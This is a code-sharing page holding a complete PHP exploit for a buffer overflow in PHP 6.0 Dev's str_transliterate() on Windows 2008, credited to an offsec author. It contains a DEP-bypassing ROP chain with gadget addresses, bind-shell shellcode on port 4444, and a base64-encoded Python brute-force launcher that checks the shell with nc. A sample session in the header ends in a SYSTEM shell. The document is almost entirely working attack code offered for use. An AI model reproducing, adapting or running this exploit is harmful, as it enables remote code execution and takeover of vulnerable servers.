扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
<?php /* 04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit Tested on Windows 2008 SP1 DEP alwayson Matteo Memelli aka ryujin ( AT ) offsec.com original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n) Thx to muts and Elwood for helping ;) Bruteforce script is attached in base64 format. root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8 (*) Php6 str_transliterate() bof || ryujin # offsec.com (*) Bruteforcing WPM ret address... (+) Trying base address 0x78000000 (+) Trying base address 0x77000000 (+) Trying base address 0x76000000 (+) Trying base address 0x75000000 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation.All rights reserved. C:\wamp\bin\apache\Apache2.2.11>whoami whoami nt authority\system */ error_reporting(0); $base_s = $_GET['pos_s']; $base_e = $_GET['pos_e']; $off_s= $_GET['off_s']; $off_e= $_GET['off_e']; if(ini_get_bool('unicode.semantics')) { $buff= str_repeat("\u4141", 32); $tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM $ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES $ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM $wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS $garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))). "\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";"; eval($garbage); $nops= str_repeat("\u9090", 41); // TH || ROP -> Try Harder or Rest On Pain ;) // GETTING SHELLCODE ABSOLUTE ADDRESS $rop= "\u40dd\u6FF2"; // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN 6FF240DD $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4 $rop .= "\uFDBC\uFFFF"; // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC $rop .= "\u222B\u6EED"; // ADD EAX,ECX/POP EBX/POP EBP/RETN 6EED222B $rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE) $rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE) // PATCHING BUFFER ADDY ARG FOR WPM $rop .= "\u1C13\u6EE6"; // ADD DWORD PTR DS:[EAX],EAX/RETN6EE61C13 // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE) $rop .= "\uE94E\u6EE6"; // MOV EDX,ECX/POP EBP/RETN 6EE6E94E $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4 $rop .= "\uFF5C\uFFFF"; // VALUE TO BE POPPED IN ECXFFFFFF5C $rop .= "\uE94C\u6EE6"; // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN 6EE6E94C $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM $rop .= "\u0C54\u6EE7"; // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN6EE70C54 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP // REALIGNING ESP TO WPM AND RETURNING TO IT $rop .= "\u8640\u6EE6"; // ADD EAX,-30/POP EBP/RETN 6EE68640 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN6EE629F1 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN6EE629F1 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u2C63\u6FC5"; // XCHG EAX,ESP/RETN6FC52C63 // unicode bind shellcode port 4444, 318 bytes $sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b". "\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824". "\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db". "\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233". "\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02". "\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189". "\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0". "\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a". "\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c". "\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155". "\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0". "\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344"; $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop; str_transliterate(0, $exploit, 0); } else { exit("Error! 'unicode.semantics' has be on!\r\n"); } function ini_get_bool($a) { $b = ini_get($a); switch (strtolower($b)) { case 'on': case 'yes': case 'true': return 'assert.active' !== $a; case 'stdout': case 'stderr': return 'display_errors' === $a; default: return (bool) (int) $b; } } /* IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91 dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6 IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9 PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt ZS5zbGVlcCgwLjA1KSAK */ ?> |
体验盒子
